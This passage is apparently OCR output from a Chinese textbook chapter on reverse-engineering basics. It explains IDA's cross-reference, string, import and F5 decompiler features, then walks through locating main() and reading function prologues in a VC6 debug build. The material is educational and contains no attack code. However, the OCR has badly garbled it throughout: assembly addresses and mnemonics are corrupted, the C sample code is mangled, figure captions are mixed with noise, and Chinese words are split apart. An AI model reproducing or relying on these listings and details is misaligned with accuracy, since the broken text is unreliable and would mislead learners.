-text:0810873CC ax, 108h 
-text:818073D1 short loc 19873F2 标号 对 应 的 注释 
-text:8189873D3 eax, 288h 
-text:810873D8 short loc 1089873DF 


-text:010073D0A 

-text:8198730A etictv29n 
-text:818873DA [ebp*var_1C], el 

-text:818873DD short loc 18687866 

stext:@1068730F ; -=-———-—- 
-text:8108073DF 

-text:810873DF loc 18873DF: 1 CODE XREF: start+3B1j 
-text:810073DF dvord ptr [ecx*8ah], QEh 

.text:818873E6 short loc 108079DA 

-text:819873E8 eax, Pax 

-text:818873E8 [ecx+Fsh]，、ebx 

-text:B10973FB Short loc_ 1687496 

-上 ext:919973F2 ; 一 一 th 
-text:818973F2 

-text:818873F2 loc 18873F2: ; CODE XREF: start*38Tj 
-text:B10873F2 duord ptr [ecx+*74h], BEh 

-text:818973F6 short loc 19973DA 


图 5-34 ”添加 注释 的 窗口 





图 5-35 交叉 引用 
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选中 一 个 标号 后 ， 所 有 不 同位 置 的 相同 标号 (标号 只 有 一 处 ， 引 用 标号 的 代码 可 能 会 有 
ee a 
双击 “交叉 引用 ”注释 会 跳 转 到 相应 的 引用 位 置 。 图 5-35 中 ,“CODE XREF : start + 34 1 j” 
表示 这 个 引用 是 从 start 函数 的 第 34 字 节 处 跳 转 而 来 ， 人 如 果 是 “p”， 表 
示 是 子 程序 调用 ， 如 “CODE XREF : start + 16F 4 p”， 类 似 的 还 有 “o”“r 

图 5-35 中 选中 的 交叉 引用 部 分 可 以 看 到 “…”( 省 略 号 )， 表 明 这 里 有 多 个 交叉 引用 。 按 
下 Ctrl+X 组 合 键 即 可 查看 所 有 的 交叉 引用 ， 如 图 5-36 所 示 。 

在 进行 动态 调试 时 ， 可 能 同时 会 通过 IDA 阅读 反 汇 编 代 码 。 这 时 可 能 需要 在 IDA 的 反 
汇编 窗口 中 不 断 跳 转 到 某 个 指定 的 地 址 处 去 阅读 反 汇 编 代 码 。IDA 提供 了 功能 丰富 的 跳 转 菜 
单 ， 如 图 5-37 所 示 。 可 能 最 常用 到 的 是 “ 跳 转 到 指定 地 址 ”。 在 反 汇编 窗口 中 按 下 G 键 ， 就 
会 出 现 “ 跳 转 到 指定 地 址 ”窗口 ， 这 类 似 于 OD 的 Ctrl + G 快捷 键 。 


es eb, [me View Debugger Opsons ¥ 








人 
i 加 jmpns new window Altrenter | 
| 所 | 各 A a 


'M En| 一 Ce Lot 
ion stack 








图 5-36 交叉 引用 窗口 图 5-37 IDA 中 提供 的 跳 转 菜 单 


在 阅读 反 汇 编 代 码 时 ,会 分 段 进行 阅读 或 分 函数 进行 阅读 。 当 了 解 某 个 函数 的 功能 后 ， 
可 以 给 函数 名 进行 重 命名 ， 这 样 方便 在 以 后 “Function name” 窗 口中 找到 已 经 分 析 完 的 函 
数 。 而 且 对 于 函数 的 重 命名 是 全 局 性 的 ， 只 要 将 函数 名 重 命名 后 ， 在 反 汇编 中 ， 所 有 对 该 
函数 的 调用 都 会 变 为 重 命名 后 的 函数 名 。 重 命名 函数 名 的 快捷 键 是 “N”( 反 汇编 中 的 变量 
亦 可 如 此 )。 

4. 字符 串 窗 口 

为 什么 要 介绍 字符 串 呢 ? 通常 情况 下 ， 一 个 功能 很 小 的 软件 都 会 反 汇 编 出 非常 多 的 反 汇 
编 代 码 ， 而 如 果 要 逐 行 阅读 反 汇编 代码 的 话 ， 简 直 是 一 项 不 可 能 的 事情 。 那 么 要 快速 定位 到 
程序 的 功能 ， 就 必须 查找 一 些 相关 特征 的 内 容 来 帮助 程序 员 在 大 量 的 反 汇编 代码 中 定位 真正 
需要 的 反 汇 编 代 码 。 字 符 串 则 可 以 帮助 程序 员 完 成 这 一 点 。 还 记得 在 介绍 OD 的 实例 时 是 如 
何 快速 定位 到 “关键 跳 ” 的 吗 ? 对 ， 就 是 通过 字符 串 进行 定位 的 。 同 样 ， 在 IDA 中 查找 某 个 
具体 功能 的 反 汇编 代码 时 ， 仍 然 首 先 考 虑 通过 查找 字符 串 来 定位 反 汇编 代码 。 

IDA 提供 了 字符 串 参 考 的 窗口 ， 但 是 默认 并 没有 打开 它 。 单 击 菜单 的 “View->Open 
subviews->Strings”， 打开 字符 串 参 考 窗口 ， 如 图 5-38 所 示 。 
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CLSID\\ADBS80A8-DBFF-11CF-9377-00AA00387A11)\\nprocS erver32 
comdig32 骨 

SHELL32 dl 

WINSPOOL DRVY 

COMCTL32 

msvct 二 


ADVAFI32 嘲 
KERNEL32 二 
6Di22 
USER32d 


第 
5 
章 
黑 
客 
逆 
向 
基 
础 


中 ncpnononnponnnpnonmnomnaon 





图 5-38 字符 串 参 考 窗 口 


5， 导 入 表 窗 口 
导入 表 窗 口中 显示 的 是 程序 中 调用 的 API 函数 ， 想 要 快速 定位 相关 功能 的 反 汇 编 代 码 ， 
除了 字符 串 参 考 以 外 ， 就 要 依靠 API 函数 了 。 导 入 表 窗 口 如 图 5-39 所 示 。 











图 5-39 ”导入 表 参 考 窗 口 


在 导入 表 窗 口中 , 双击 某 个 API 函数 即 可 进入 导入 表 在 反 汇 编 窗口 中 的 位 置 , 如 图 5-40 所 示 。 


:O12 ’ sob 1006773+5CAYP 

:aot ; MATA XREF: 

Apa2s ; int _stdcall Abortboc(HDC hdc) 

:W102C extrn bortboc:dword 7 CODE XREF: sub _ 19006773*5F6}p 

TOO 2C barn : SH T100779+5P6}r 

:B1601038 ; int _stdcall Endpoc(HDC hdc) 

:TARTDSN extrn Endonc:dword ; CODE : Sub_ 108067739:10c_ 19086DAT}p 
:901091088 ;DATA NREF; wub TG77S: Loc T0660 
HINO ; BONL stdcall DeleteDC(HDE hdc) 

:019081094 extrn DeleteDC:dword ; CODE : Sub_ 1006779+6NA4P 
too 7 DATN NREF: syh T006779r6NRLr 
:nos ; int stdcall StartPage(HDE hdc) 

ELL extrn StartPage:dword ; CODE XREF: Sub 49096779*4F 86)p 
:aginng DATA XREF: Sup FHM773: 4 Lr 
a:0100103€ 7 BOOL _ stdcall GetTextExtentPoint32W(HDC hdc, LPCWSTR lpSstring, int c, LPSIZE 
-O01 extrn GatTextExtentPoints2:dword 

SBI1g01990 1 CODE XREF: Sub_ 1006657+*914p 
0109019006 7 Syb T005657+E61p 

:0 601 03€ 1 DATR XHEF:; ,i, 

O00 7 HDC _ stdcall CreateDCWCLPCWSTR puszDriver, LPCHSTR puszDevice, LPEWSTR pszPo 
了 从 1 日 人 1 08 全 extrn CreateDpey:dword 7 CODE XREF: Sub 1096428*704p 
:10010A0 ; Sub 1906NF3+951p 





图 5-40 ”导入 表 在 反 汇编 窗口 中 的 位 置 
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在 进入 反 汇编 窗口 中 后 , 通过 API 函数 对 应 的 交叉 引用 可 以 快速 定位 到 调用 该 API 函数 
的 反 汇编 代码 处 。 使 用 API 进行 定位 相对 比 通过 字符 串 定位 多 了 一 个 要 求 ， 那 就 是 在 通过 
API 函数 进行 定位 时 需要 了 解 API 函数 的 作用 。 由 此 可 见 ， 在 进行 道 向 分 析 时 ， 对 软件 开发 
知识 的 掌握 也 是 有 一 定 要 求 的 。 

6. 保存 工程 文件 

用 IDA 进行 逆向 反 汇 编 分 析 后 ， 在 关闭 IDA 时 会 提示 是 否 保存 分 析 文 件 ， 选 择 “Pack 
database (Store)” 即 可 将 IDA 的 反 汇 编 工 程 文件 进行 保存 。 保 存 该 文件 会 将 程序 员 在 分 析 时 
记录 的 注释 、 修 改 的 变量 或 函数 名 都 能 完整 保存 。IDA 保存 的 工程 文件 扩展 名 为 .idb。 下 载 
并 用 IDA 进行 分 析 时 ， 可 以 接着 上 次 的 分 析 继 续 进 行 。 当 对 某 个 程序 分 析 完 成 后 ， 进 行 交流 
时 ， 只 共享 .idb 文件 也 非常 方便 。 

7. 强大 的 F5 功能 

IDA 下 有 多 种 多 样 的 插件 ， 有 关于 格式 识 
别 的 ， 有 补丁 分 析 的 等 。 其 中 有 一 款 揪 件 特别 
有 特色 ， 它 叫 作 Hex-Rays Decompiler。 该 插件 
可 以 将 反 汇 编 代 码 直接 反 编 译 为 高 级 语言 。 使 
用 它 非常 简单 ， 只 要 在 相应 的 反 汇编 代码 上 按 
下 F5 键 ， 即 可 出 现 相 应 的 高 级 语言 。 

在 IDA 中 随便 找 一 处 反 汇 编 代 码 , 然后 按 
下 F5 键 ， 可 以 看 到 图 5-41 所 示 的 高 级 语言 代 
码 。 出 现 的 反 汇 编 代 码 类 似 C/C++ 语言 的 代码 ， 
对 于 功能 相对 独立 的 反 汇 编 代 码 函 数 段 ， 可 以 
通过 IDA 的 F5 功能 将 其 转换 成 高 级 语言 后 ， 
进行 简单 的 修改 ， 再 来 使 用 。 

IDA 的 功能 非常 强大 ， 不 是 短 短 几 句 就 能 El 
介绍 完 的 ， 即 使 是 权威 书籍 也 无 法 将 IDA 介绍 完整 。 至 于 对 于 IDA 的 学 习 ， 只 能 算是 皮毛 
的 入 门 。 关 于 IDA 的 知识 就 介绍 到 这 里 ， 更 多 的 IDA 知识 请 读者 参考 具体 的 相关 书籍 或 资 
料 来 进行 更 深入 的 学 习 和 研究 。 


5.4 C 语 言 代码 逆向 基础 


在 学 习 编 程 的 过 程 中 , 需要 阅读 大 量 的 源 代码 才能 提高 自身 的 编程 能 力 。 同 样 ,在 做 
产品 的 时 候 也 需要 大 量 参 考 同行 的 软件 才能 改善 自己 产品 的 不 足 。 如 果 发 现 菜 个 软件 的 功 
能 非常 不 错 ， 是 自己 急需 融入 自己 软件 产品 的 功能 ,而 此 时 又 没有 源 代码 可 以 参考 ， 那 么 
程序 员 唯 一 能 做 的 只 有 通过 逆向 分 析 来 了 解 其 实现 方式 。 除 此 之 外 ， 当 使 用 的 菜 个 软件 
存在 Bug， 而 该 软件 已 经 不 再 更 新 时 ， 程 序 员 能 做 的 并 不 是 去 寻找 同类 的 其 他 软件 ， 而 
是 可 以 通过 逆向 分 析 来 自行 修正 其 软件 的 Bug， 从 而 很 好 地 继续 使 用 该 软件 。 道 向 分 析 
程序 的 原因 很 多 ， 除 了 前 面 的 情况 外 ， 还 有 些 情况 不 得 不 进行 道 向 分 析 ， 比 如 病毒 分 析 、 
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yehar_t su2; /7 #6xR2 
Y rt Dests A/ Tsp*2h} Top-194h]O7 
int vhs /7 [sp*19th) Fhp-sh 8 


v4 = dword 1009684; 
Jit = CommDlgExtendedError(); 
it ) 


if ( result == (int =)((char x)E&dword 10091A0 + v1) )》 
93 har 1 =)xx(ink #5)((0nat »)&off 10091A4 + VT) 7 





》 

while ( vi < Ox40 ); 

if ( ou ) 
snwprintf(BDest, OxC7u, dword 18890A8, FSULIt); 
V2 = ED0est; 


》 
if ( wu2 ) 

MessageBoxW(dword 1889839, J2, 1pCaption, fx1910u); 
result = 13 
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漏洞 分 析 等 。 

可 能 病毒 分 析 、 漏 洞 分 析 等 高 深 技 术 对 于 有 些 人 来 说 目前 还 无 法 达到 ， 但 是 其 基础 知识 
部 分 都 离 不 开道 向 知识 。 下 面 借助 IDA 来 分 析 由 VC6 编译 连接 C 语言 的 代码 ， 从 而 来 学 习 
掌握 道 向 的 基础 知识 。 


5.4.1 函数 的 识别 


在 通过 阅读 反 汇 编 代 码 进行 逆向 分 析 时 ， 第 一 步 是 要 对 函数 进行 识别 。 这 里 的 识别 指 的 
是 确定 函数 的 开始 位 置 、 结 束 位 置 、 参 数 个 数 、 返 回 值 以 及 函数 的 调用 方式 。 在 逆向 分 析 的 
过 程 中 ， 不 会 把 单个 的 反 汇编 指令 作为 最 基本 的 北向 分 析 单 位 ， 因 为 一 条 指令 只 能 表示 出 
CPU 执行 的 是 何 种 操作 ， 而 无 法 明确 反映 出 一 段 程序 的 功能 所 在 。 就 像 在 用 C 语言 进行 编程 
时 ， 很 难 不 通过 代码 的 上 下 文 关系 去 了 解 一 条 语句 的 含义 。 

1. 简单 的 C 语言 函数 调用 程序 

为 了 方便 介绍 关于 函数 的 识别 ， 这 里 写 一 个 简单 的 C 语言 程序 ， 用 VC6 进行 编译 连接 。 
C 语言 的 代码 如 下 : 

#include <stdio.h> 

#incliude <windows .h> 


ant test (char *szStr, int DaNum) 


printf("Sey Sd NEN\nM, Smetr, Nm) 7 
MessageBox (NULL, szStr, NULL, MB_ OK); 


return SY? 


int mainl(int argc, char ** argv) 
int nNum = test("hello", 6); 
printf("$%d \r\n", nNum); 


return 0: 


} 
在 程序 代码 中 ， 自 定义 函数 test0 由 主 函 数 main0 所 调用 ，test() 函 数 的 返回 值 为 int 类 型 。 
在 test() 函 数 中 调用 了 printf() 函 数 和 MessageBox() 函 数 。 将 代码 在 VC6 下 使 用 DEBUG 方式 
进行 编译 连接 来 生成 一 个 可 执行 文件 ， 对 该 可 执行 文件 通过 IDA 进行 逆向 分 析 。 
-DD 注 : 以 上 代码 的 扩展 名 为 “c”， 而 不 是 “cpp”。 本 节 用 来 进行 逆向 分 析 的 例子 均 使 用 DEBUG 方式 在 VC6 
下 进行 编译 连接 。 关 于 RELEASE 方式 编译 连接 后 的 道 向 分 析 ， 由 读者 根据 书 中 的 思路 自行 进行 分 析 。 


2. 函数 逆向 分 析 

大 多 数 情况 下 程序 员 都 是 针对 自己 比较 感 兴 趣 的 程序 部 分 进行 逆向 分 析 ， 分 析 部 分 功能 
或 者 部 分 关键 函数 。 因 此 ， 确 定 函 数 的 开始 位 置 和 结束 位 置 非 常 重要 。 不 过 通常 情况 下 ， 函 
数 的 起 始 位 置 和 结束 位 置 都 可 以 通过 反 汇 编 工 具 自 动 识 别 ， 只 有 在 代码 被 刻意 改变 后 才 需 要 
程序 员 自 己 进行 识别 。IDA 可 以 很 好 地 识别 函数 的 起 始 位 置 和 结束 位 置 ， 如 果 在 逆向 分 析 的 
过 程 中 发 现 有 分 析 不 准确 的 时 候 ， 可 以 通过 Alt+P 快捷 键 打开 “Edit function”( 编 辑 函数 ) 
对 话 框 来 调整 函数 的 起 始 位 置 和 结束 位 置 。“Edit function” 对 话 框 的 界面 如 图 5-42 所 示 。 在 
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图 5-42 中 ， 被 选中 的 部 分 可 以 设 定 函数 的 起 始 地 址 和 结束 地 址 。 关 于 “Edit function” 对 话 
框 的 使 用 ， 这 里 不 做 介绍 。 
用 IDA 打开 VC6 编译 好 的 程序 ， 在 打开 的 时 候 ，IDA 会 有 一 个 提示 ， 如 图 5-43 所 示 。 
该 图 询问 是 否 使 用 PDB 文件 。PDB 文件 是 程序 数据 库 文 件 ， 是 编译 器 生成 的 一 个 文件 ， 方 
便 程序 调试 使 用 。PDB 包含 函数 地 址 、 全 局 变量 的 名 字 和 地 址 、 参 数 和 局 部 变量 的 名 字 和 在 
堆栈 的 偏 移 量 等 很 多 信息 。 这 里 选择 “Yes” 按 钮 。 





5-42 “Edit function” 对 话 框 图 5-43 ”提示 是 否 使 用 PDB 文件 


子 人 注 ; 在 分 析 其 他 程序 的 时 候 ， 通 常 没有 PDB 文件 ， 那 么 这 里 会 选择 “No” 按钮 。 在 有 PDB 和 无 PDB 文 
件 时 ，IDA 的 分 析 结果 是 截然 不 同 的 。 请 读者 在 自己 分 析 时 ， 尝 试 对比 不 加 载 编译 器 生成 的 PDB 文件 和 加 
载 了 PDB 文件 IDA 生成 的 反 汇编 代码 的 差异 。 


当 IDA 完成 对 程序 的 分 析 后 ，IDA 直接 找到 了 main() 函 数 的 跳 表 项 ， 如 图 5-44 所 示 。 





_main_ 8 proc near ; CODE XREF: _mainCRTStartup*E44P 
mp _main 


_main_B endp 





; [eee86995 BYTES: COLLAPSED FUNCTION jtest. PRESS KEYPAD TO EXPAND] 
db 11h dup(ecch) 


图 5-44 _ main0 函 数 的 跳 表 


所 谓 main() 函 数 的 跳 表 项 ， 意 思 是 这 里 并 不 是 main() 函 数 的 真正 的 起 始 位 置 ， 而 是 该 位 
置 是 一 个 跳 表 ， 用 来 统一 管理 各 个 函数 的 地 址 。 从 图 5-44 中 看 到 ， 有 一 条 jmp _main 的 汇编 
代码 ， 这 条 代码 用 来 跳 向 真正 的 main(0) 函 数 的 地 址 。 在 IDA 中 查看 图 5-44 上 下 位 置 ， 可 能 
只 能 找到 这 人 么 一 条 跳 转 指令 。 在 图 5-44 的 靠 下 部 分 有 一 句 注释 为 “[00000005 BYTES: 
COLLAPSED FUNCTION j test. PRESS KEYPAD "+" TO EXPAND]”。 这 里 是 可 以 展开 的 ， 
在 该 注释 上 单 击 右键 ， 出 现 右键 菜单 后 选择 “Unhide” 项 ， 则 可 以 看 到 被 隐藏 的 跳 表 项 ， 如 
5-45 所 示 。 

在 实际 的 反 汇编 代码 时 ，jmp _ main 和 jmp test 是 紧 挨 着 的 两 条 指令 ， 而 且 jmp 后 面 是 
两 个 地 址 。 这 里 的 显示 函数 形式 、_ main 和 test 是 由 IDA 进行 处 理 的 。 在 OD 下 观察 跳 表 的 
形式 ， 如 图 5-46 所 示 。 





5.4 C 语言 代码 逆向 基础 























_main 0 proc near ; CODE XREF: mainCRTStartup+Ekip 
jnmp _main 
_main 0 endp 第 
5 
SUNROU TT NE ======c==re= r====2=r= 了 章 
; Attributes: thunk | 
j_test proc near ; CODE XREF: nain+1Fip 黑 
jnmp _test 客 
j_test endp 逆 
图 5.45 “展开 后 的 跳 表 





CC | int3 


| $, E9 960696669 | jmp [8eue1989] 一 一 main 0 函数 
$9 11999999 | jmp MTZ test() 函数 


Ce |inta 
Te 1 卫生 全 


| 








图 5-46 OD 中 跳 表 的 指令 位 置 


并 不 是 每 个 程序 都 能 被 IDA 识别 出 跳 转 到 main() 函 数 的 跳 表 项 ， 而 且 程序 的 入 口 点 也 并 
非 main0 函 数 。 首 先 来 看 一 下 程序 的 入 口 函数 位 置 。 在 IDA 上 单 击 窗口 选项 卡 ， 选 择 “Exports” 
窗口 (Exports 窗口 是 导出 窗口 ， 用 于 查看 导出 函数 的 地 址 ， 但 是 对 于 EXE 程序 来 说 通常 是 
没有 导出 函数 的 ， 这 里 将 显示 EXE 程序 的 入 口 函数 )， 在 “Exports” 窗 口中 可 以 看 到 
_mainCRTStartup， 如 图 5-47 所 示 。 


x 国 IDAViews | x [9 Hasviews | 六 页 Sucues| x En Enums | X BR Impons x Ewports 


油 _mainCRTStatup 








图 5-47 Exports 窗口 
双击 mainCRTStartup 就 可 以 到 达 启 动 函数 的 位 置 了 。 这 里 又 一 次 说 明了 在 C 语言 中 ， 


main() 不 是 程序 运行 的 第 一 个 函数 ,而 是 程序 员 编 写 程序 时 的 第 一 个 函数 ，main() 函 数 是 由 启 
动 函数 来 调用 的 。 现 在 看 一 下 _mainCRTStartup 函数 的 部 分 反 汇 编 代码 : 


‘text:004011D0 Public mainCRTStartup 
‘text:004011D0 mainCRTStartup Proc near 
.text:004011D0 


.text:004011D0 Code 
.text:004011D0O var 18 
.text:004011D0 wvar 4 


dword ptr -1Ch 
dword ptr -18h 
dword ptr -4 


UW 


.text:004011D0 

.text:004011D0 push ebp 

.text:004011D1 mov ebp, esp 

:text:004011D3 push OPRRRREEBRED 
‘text:004011D5 push offset stru 422148 
.text:004011DA push offset _ except handler3 
"text:004011DF me 六 eax, large fs:0 
text:004011E5 push eax 

text:004011E6 mov large fs:0, esp 
.text:004011ED add esp, OFFFFEFFOhN 
:text:004011F0 push ebx 

:text:004011F1 push esi 

-text:004011F2 push edi 

text:004011F3 mov [ebp+var_18], ésp 
.text:004011F6 call ds: imp GetVersione0 ; GetVersion () 
.text:004011FC mov _ Osver, eax 
.text:00401201 mov eax, __Osver 
.text:00401206 shr eax, 8 
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"text;00401209 and eax, OFFEh 
.text:0040120E mov Wwinminor, eax 
.text:00401213 mov eCx; , Osver 
.text:00401219 and ecx, OFFh 
“text:0040121F mOV _ Winmajor, Ecx 
:text:00401225 mov edx, _ winmajor 
.text:0040122B shl edx, 8 

.text:0040122E add edx, _ winminor 
.text:00401234 IO _ Winver, edx 
.text:0040123A mov eax, .Osver 
.text:0040123F shr eax, 10h 
“text:00401242 and eax, OFFFEh 
.text:00401247 mov _Osver, eax 
.text:0040124C push 0 

.text:0040124E call heap, init 
:text:00401253 add esp, 4 

.text:00401256 test eax, eax 
:text:00401258 jnz Short ioc 401264 
text:0040125A push LCN 

.text:0040125C call fast error exit 
‘text:0040126]17 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 = 一 一 
‘text:00401261 add esp,; 4 

.text:00401264 

text:00401264 loc 401264; ; CODE XREF: mainCRTStartup+88j 
text:00401264 mo 六 [ebp+var 4], 0 
.text:0040126B caill TOE 
.text:00401270 call ds: imp GetCommandLineA@0 ; GetCommandLineA!() 
.text:00401276 mov _acmdln, eax 
.text:0040127B call crtGetEnvironmentStringsA 
.text:00401280 mov _aenvptr, eax 
‘text:00401285 位 上 册 __SetargV 
‘text:0040128A call Setenvp 
-text:0040128F Ga le 

‘text:;00401294 mov ecx, _ environ 
.text:0040129A moOV _ initenv, ecx 
.text:004012A0 mov edx, _ environ 
:text:004012A6 push edx 

‘text:004012A7 mov eax, _ argv 
.text:004012AC push eax 

.text:004012AD mov SC .Age 
.text:004012B3 push eCX 

.七 ext:004012B4 call "maini0 

‘text:004012B9 add esp Ven 
“text:004012BC mov [ebp+Code], eax 
.text:004012BF IOV edx, [ebp+Code] 
.text:004012C2 push edx » Code 
‘text:004012C3 call _exit 


:text:004012C3 mainCRTStartup endp 


从 反 汇编 代码 中 可 以 看 到 ，main() 函 数 的 调用 在 004012B4 位 置 处 。 启 动 函 数 从 004011D0 
地 址 处 开始 ， 期 间 调 用 GetVersion() 函 数 获得 了 系统 版 本 号 、 调 用 ”heap_init 函数 初始 化 了 程 
序 所 使 用 的 堆 空 间 、 调 用 GetCommandLineA() 函 数 获取 了 命令 行 参 数 、 调 用 _crtGetEnviro 
nmentStringsA 函数 获得 了 环境 变量 字符 串 …… 在 完成 一 系列 启动 所 需 的 工作 后 ， 终 于 在 
004012B4 处 调用 了 _main 0。 由 于 这 里 使 用 的 是 调试 版 且 有 PDB 文件 , 因此 在 反 汇 编 代 码 中 
直接 显示 出 程序 中 的 符号 ， 在 分 析 其 他 程序 时 是 没有 PDB 文件 的 ， 这 样 main_0 就 会 显示 为 
一 个 地 址 ， 而 不 是 一 个 符号 。 不 过 依然 可 以 通过 规律 来 找到 _main_0 所 在 的 位 置 。 

没有 PDB 文件 ， 如 何 找 到 _main_0 所 在 的 位 置 呢 ? 在 VC6 中 ， 启 动 函 数 会 依次 调用 
GetVersion()、GetCommandLineA()、GetEnvironmentStringsA() 等 函数 ， 而 这 一 系列 函数 即 是 
一 串 明 显 的 特征 。 在 调用 完 GetEnvironmentStringsA() 后 ， 不 远 处 会 有 3 个 push 操作 ， 分 别 
是 main() 函 数 的 3 个 参数 ， 代 码 如 下 : 
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87 
.text:004012A0 mov edx, ,environ 
.text:004012A6 push edx 
.text:004012A7 mov eax, argy 第 
.text:004012AC push eax 5 
.text:004012AD mov GCC 章 
:text:004012B3 push ecx 
.text;004012B4 call umain'O 黑 
该 反 汇编 代 码 对 应 的 C 代码 如 下 : 客 
#ifdef WPRFLAG 这 
Winitenv = wenviron; 向 
mainret = wmain(, argce， wargv, .wenviron); 基 
#else /* WPREFLAG */ 础 
initenyv = environ; 
mainret = main( argc, , argv, ,environ); 
#endif /YX WERELAG */ Vr 


该 部 分 代码 是 从 CRT0.C 中 得 到 的 , 可 以 看 到 启动 函数 在 调用 main() 函 数 时 有 3 个 参数 。 

接着 上 面 的 内 容 , 在 3 个 push 操作 后 的 第 1 个 call 处 , 即 是 main 0 函数 的 地 址 . 往 main 0 
下 面 看 ，_ main 0 后 地 址 为 004012C3 的 指令 为 call _exit。 确 定 了 程序 是 由 VC6 编写 的 ， 那 
么 找到 对 _exit 的 调用 后 ， 往 上 找 一 个 call 指令 就 找到 main_ 0 所 对 应 的 地 址 。 读 者 可 以 依照 
该 方法 进行 测试 。 

在 顺利 找到 _ main 0 函数 后 ， 直 接 双 击 反 汇编 的 _main_ 0， 到达 函数 跳 转 表 处 。 函 数 跳 转 
表 在 前 面 已 经 提 到 ， 这 里 不 再 复述 。 在 跳 转 表 中 双击 main， 即 可 到 真正 的 _ main 函数 的 反 汇 
编 代 码 处 。 main 函数 的 返 汇编 代码 如 下 : 


text:002010A0 main proc near OD RE ala 
.text:004010A0 
.text:004010A0 wvar 44 
:text:004010A0 var 4 
.text:004010A0 





byte ptr -44h 
dword ptr 一 4 


La 


.text:004010A0 push ebp 
.text004010Al mov ebpy, esp 
.text:;004010A3 sub esp, 44h 
.text:004010A6 push ebx 
“text;004010A7 push esi 
.text:004010A8 push edi 
.text:;004010A9 lea edi, [ebptvar_44] 
‘text:0Q04010AC mov ec ,LL 
.text:004010B1 mov eax， OQCCCOCCCCECh 
.text:004010B6 rep stosd 

.text:004010B8 push 6 

.text:004010BA push offset aHello #0 i ey 
text:004010BF call 本 七 es 七 
:Eext0040L10C4 add esp, 8 
.text:004010C7 mov lebptvar dl, eax 
.text:004010CA moy eax, [ebpt+var_4] 
.text:004010CD push eax 
‘text:004010CE push offset aD mE rN 
.text:004010D3 call Lbrintt 
:text:004010D8 add 全 SB 8 
.text:004010DB XO eax, eax 
.text:004010DD pop edi 
,text:004010DE pop esi 
.text:004010DE pop ebx 
.text:004010E0 add esp, 44h 
.text:004010E3 cmp ebp, esp 
:text:004010E5 Ca -chkesp 
text:004010EA mov esp, ebp 
.text:004010EC pop ebp 
text:004010ED retn 

.text:0040L0ED “main endp 
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短 短 几 行 C 语言 代码 , 在 编译 连接 生成 可 执行 文件 后 ,再 进行 反 汇编 竟然 生成 了 比 C 语 
言 代码 多 很 多 的 代码 。 仔 细 观 察 上 面 的 反 汇 编 代码 ， 通 过 特征 可 以 确定 这 是 写 的 主 函 数 ， 首 
先 代码 中 有 一 个 对 test0 函 数 的 调用 在 004010BF 地 址 处 , 其 次 有 一 个 对 printf() 函 数 的 调用 在 
004010D3 地 址 处 。_main 函数 的 入 口 部 分 代码 如 下 : 


,text:004010A0 push ebp 
.text:004010A1 IOV ebp, esp 
.text:004010A3 sub esp, 44h 
.text:004010A6 push ebx 
-text:004010A7 Push esi 
.text:004010A8 push edi 
.text:004010A9 lea edi, [ebptvar 44] 
taxt:004010AC mov (rbd a oy 
“text0040LoR mov eax, 0CECCECCECh 
.text:004010B6 rep stosd 


大 多 数 函 数 的 入 口 处 都 是 push ebp/mov ebp, esp/sub esp，X X XX 这样 的 形式 , 这 几 句 代码 
完成 了 保存 栈 帧 ， 并 开辟 了 当前 函数 所 需 的 栈 空 间 。push ebx/push esi/push edi 是 用 来 保存 几 
个 关键 寄存 器 的 值 ， 以 便 函 数 返 回 后 这 几 个 寄存 器 中 的 值 还 能 在 调用 函数 处 继续 使 用 而 没有 
被 破坏 掉 。lea edi, [ebp + var 44]/mov ecx, 11h/move ax , 0CCCCCCCCh/rep stosd， 这 几 句 代码 
是 开辟 的 内 存 空间 ， 全 部 初始 化 为 0xCC。0xCC 被 当 作 机 器 码 来 解释 时 ， 其 对 应 的 汇编 指令 
为 int3， 也 就 是 调用 3 号 断 点 中 断 来 产生 一 个 软件 中 断 。 将 新 开辟 的 栈 空 间 初 始 化 为 0xCC， 
这 样 做 的 好 处 是 方便 调试 ， 尤 其 是 给 指针 变量 的 调试 带 来 了 方便 。 

以 上 反 汇 编 代 码 是 一 个 国定 的 形式 ， 唯 一 会 发 生变 化 的 是 sub esp，X XX 部分， 在 当前 
反 汇 编 代 码 处 是 sub esp, 44h。 在 VC6 下 使 用 Debug 方式 编译 ， 如 果 当 前 函数 没有 变量 ， 那 
么 该 名 代码 是 sub esp, 40h; 如 果 有 一 个 变量 ， 其 代码 是 sub esp, 44h， 有 两 个 变量 时 ， 为 sub 
esp, 48h。 也 就 是 说 ， 通 过 Debug 方式 编译 时 ， 函 数 分 配 栈 空间 总 是 开辟 了 局 部 变量 的 空间 后 
又 预 留 了 40h 字 节 的 空间 。 局 部 变量 都 在 栈 空间 中 , 栈 空 间 是 在 进入 函数 后 临时 开辟 的 空间 ， 
因此 局 部 变量 在 函数 结束 后 就 不 复 存 在 了 。 与 函数 入 口 代码 对 应 的 代码 当然 是 出 口 代 码 ， 其 





代码 如 下 : 
.text:004010DD Pop edi 
‘text:004010DE pop e831 
.text:004010DF pop ebx 
-text:00401]080 add esp, 44h 
:text:004010E3 emp ebp, esp 
"text*00401085 al chkesp 
-text:004010EA mov es 了 ebp 
.text:004010EC pop ebp 
‘text:004010ED retn 
.text:0O04010RD, main endp 


函数 的 出 口 部 分 (或 者 是 函数 返回 时 的 部 分 ) 也 属于 固定 格式 ， 这 个 格式 跟 入 口 的 格式 
基本 是 对 应 的 。 首 先是 pop edi/pop esi/pop ebx， 这 里 是 将 入 口 部 分 保存 的 几 个 关键 寄存 器 的 
值 进行 恢复 。push 和 pop 是 对 堆栈 进行 操作 的 指令 。 堆 栈 结构 的 特点 是 后 进 先 出 ， 或 先进 后 
出 。 因此, 在 函数 的 入 口 部 分 的 入 栈 顺 序 是 push ebx/push esi/push edi， 出 栈 顺 序 则 是 倒序 pop 
edi/pop esi/pop ebx。 恢 复 完 寄存 器 的 值 后 ， 需 要 恢复 esp 指针 的 位 置 ， 这 里 的 指令 是 add esp， 
44h， 将 临时 开辟 的 栈 空间 释放 掉 ( 这 里 的 释放 只 是 改变 寄存 器 的 值 ， 其 中 的 数据 并 未 清除 
掉 )， 其 中 44h 也 是 与 入 口 处 的 44h 对 应 的 。 从 入 口 和 出 口 改 变 esp 寄存 器 的 情况 可 以 看 出 ， 
栈 的 方向 是 由 高 地 址 向 低地 址 方向 延伸 的 ， 开 辟 空 间 是 将 esp 做 减法 操作 。mov esp, ebp/pop 
